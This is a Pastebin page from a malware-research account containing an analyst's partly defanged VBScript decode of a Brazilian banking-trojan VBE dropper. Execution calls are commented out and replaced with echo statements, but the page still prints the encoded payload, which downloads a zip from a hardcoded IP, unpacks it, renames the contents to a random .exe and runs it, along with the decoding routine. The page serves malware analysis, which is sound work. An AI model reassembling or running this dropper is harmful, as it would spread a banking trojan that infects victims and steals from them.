API tools faq
paste
MalwareMustDie

Banco VBE decoded

MalwareMustDie
Aug 28th, 2015
919
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 4.15 KB | None | 0 0
raw download clone embed print report
  1. // shared vbe decoded beautified script
  2. // with comment - case: banco, Brazil
  3. // #MalwareMustDie
  4.  
  5. Wscript.Echo "press to start,,,"
  6.  
  7. '// mainvar6
  8. '//SUB mainvar6
  9.  
  10. '// -------commented  all except the path check var ones..
  11.  
  12. SET mainvar7 = WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL")
  13. '// SET mainvar8 = GETOBJECT ("WINMGMTS:\\.\ROOT\CIMV2")
  14. '// SET mainvar9 = mainvar8.EXECQUERY ("SELECT * FROM WIN32_COMPUTERSYSTEM")
  15.  
  16. '// FOR EACH pcinfo0 IN mainvar9
  17. '// pcinfo1 = pcinfo0.SYSTEMTYPE
  18. '// NEXT
  19.  
  20. '// IF (UCASE(pcinfo1) = "X64-BASED PC") AND (INSTR (UCASE(WSCRIPT.PATH),"SYSWOW64") = 0) THEN
  21. '//    mainvar7.RUN mainvar7.EXPANDENVIRONMENTSTRINGS("%WINDIR%")&"\SYSWOW64\WSCRIPT.EXE "&CHR(34)&WSCRIPT.SCRIPTFULLNAME&CHR(34)
  22.  
  23. Wscript.Echo  mainvar7.EXPANDENVIRONMENTSTRINGS("%WINDIR%")&"\SYSWOW64\WSCRIPT.EXE "&CHR(34)&WSCRIPT.SCRIPTFULLNAME&CHR(34)
  24.  
  25. '//    WSCRIPT.QUIT
  26. '// END IF
  27.  
  28. '// ------comment end
  29.  
  30. '//END SUB
  31.  
  32. Wscript.Echo "loading var2,,,"
  33.  
  34. var2 = ">1yvf = ''shhn://5.175.145.181/fkyvec/ehrwjhw.zrn''jwh bjswff = ovwuhwbekwoh(''ajovrnh.jswff'')jwh gjb = ovwuhwbekwoh(''jovrnhrtc.grfwjxjhwpbekwoh'')jhvsbpwgbflwv = bjswff.wdnutlwtirvbtpwthjhvrtcj(''%unnluhu%'')gbflwvtupw = jhvsbpwgbflwv + ''\'' + vutlbpjhvrtc() + ''\''jwh bgjb = ovwuhwbekwoh(''jovrnhrtc.grfwjxjhwpbekwoh'')rg tbh bgjb.gbflwvwdrjhj(gbflwvtupw) hswtjwh bekgbflwv = bgjb.ovwuhwgbflwv(gbflwvtupw)wtl rgnyjs_hb = gbflwvtupw & vutlbpjhvrtc() & ''.zrn''nyjs yvf,nyjs_hbzrngrfw= nyjs_hbwdhvuohhb= gbflwvtupwjwh gjb = ovwuhwbekwoh(''jovrnhrtc.grfwjxjhwpbekwoh'')rg tbh gjb.gbflwvwdrjhj(wdhvuohhb) hswt   gjb.ovwuhwgbflwv(wdhvuohhb)wtl rgjwh bekjswff = ovwuhwbekwoh(''jswff.unnfrouhrbt'')jwh grfwjrtzrn=bekjswff.tupwjnuow(zrngrfw).rhwpjbekjswff.tupwjnuow(wdhvuohhb).obnxswvw(grfwjrtzrn)jwh gjb = tbhsrtcjwh bekjswff = tbhsrtctwa_grfw_tupw = vutlbpjhvrtc() & ''.wdw''jwh gjb = ovwuhwbekwoh(''jovrnhrtc.grfwjxjhwpbekwoh'')jwh bgflv = gjb.cwhgbflwv(gbflwvtupw)gbv wuos bgrfw rt bgflv.grfwj rg foujw(gjb.cwhwdhwtjrbttupw(bgrfw.tupw)) = ''hdh'' hswt  bgrfw.tupw = twa_grfw_tupw  wdrh gbv wtl rgtwdhjwh bekjswff = ajovrnh.ovwuhwbekwoh( ''ajovrnh.jswff'' )bekjswff.wdwo(gbflwvtupw & twa_grfw_tupw)'tbpw obvvwhb lb wdwjwh bekjswff = tbhsrtcjye nyjs( pxgrfwyvf, pxlwjhgrfw )lrp dshhn: jwh dshhn = ovwuhwbekwoh(''provbjbgh.dpfshhn'')lrp ejhvp: jwh ejhvp = ovwuhwbekwoh(''ulble.jhvwup'')dshhn.bnwt ''cwh'', pxgrfwyvf, gufjwdshhn.jwtlarhs ejhvp    .hxnw = 1 '//ertuvx    .bnwt    .avrhw dshhn.vwjnbtjweblx    .juiwhbgrfw pxlwjhgrfw, 2 '//biwvavrhwwtl arhswtl jyegytohrbt vutlbpjhvrtc()    vutlbprzw()    lrp osuvuohwvjwhuvvux    osuvuohwvjwhuvvux = uvvux(_        uvvux(7, ''var6''), _        uvvux(1, ''0123456789'') _    )    lrp r    lrp k    lrp obyth    lrp osuvj    lrp rtlwd    lrp hwpn    gbv r = 0 hb yebytl(osuvuohwvjwhuvvux)        obyth = osuvuohwvjwhuvvux(r)(0)        osuvj = osuvuohwvjwhuvvux(r)(1)        gbv k = 1 hb obyth            rtlwd = rth(vtl() * fwt(osuvj)) + 1            hwpn = hwpn & prl(osuvj, rtlwd, 1)        twdh    twdh    lrp hwpnobnx    lb ythrf fwt(hwpn) = 0        rtlwd = rth(vtl() * fwt(hwpn)) + 1        hwpnobnx = hwpnobnx & prl(hwpn, rtlwd, 1)        hwpn = prl(hwpn, 1, rtlwd - 1) & prl(hwpn, rtlwd + 1)    fbbn    vutlbpjhvrtc = hwpnobnxwtl gytohrbt>!<"
  35.  
  36. Wscript.Echo var2
  37.  
  38. Wscript.Echo "decoding var2,,,"
  39.  
  40. var1 = InStr(var2,chr(62) & "1")
  41. var3 = InStr(var2,chr(62) & "!" & Chr(60))
  42. var3 = var3 -1
  43. var4 = var3 - var1
  44. var1 = var1 + 1
  45. var5 = Replace(Mid(var2,var1,var4),"''","""")
  46. nextvar0="var6"
  47. nextvar1=var5
  48.  
  49. for nextvar3=2 to len(nextvar1)
  50. nextvar4=mid(nextvar1,nextvar3,1)
  51. if instr(nextvar2,nextvar4) then
  52.      xxx = instr(nextvar0,nextvar4)
  53.      yyy = mid(xxx , nextvar2 , 1)
  54.      nextvar5 = nextvar5 & yyy
  55. else
  56.      nextvar5=nextvar5&nextvar4
  57. end if
  58. next
  59.  
  60. maincall(split(nextvar5,""))
  61. 'MrZer0
  62.  
  63. Function maincall(pcinfo)
  64. Set badness = CreateObject("ScriptControl")
  65. badness.Language = "VBScript"
  66. badness.addobject "wscript",wscript
  67. badness.TimeOut = -1
  68.  
  69. For each i in pcinfo
  70.   shits = shits & i & vbcrlf
  71. next
  72.  
  73. '//badness.addcode(shits)
  74.  
  75. Wscript.Echo shits
  76.  
  77. end function
  78. [EOF]
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!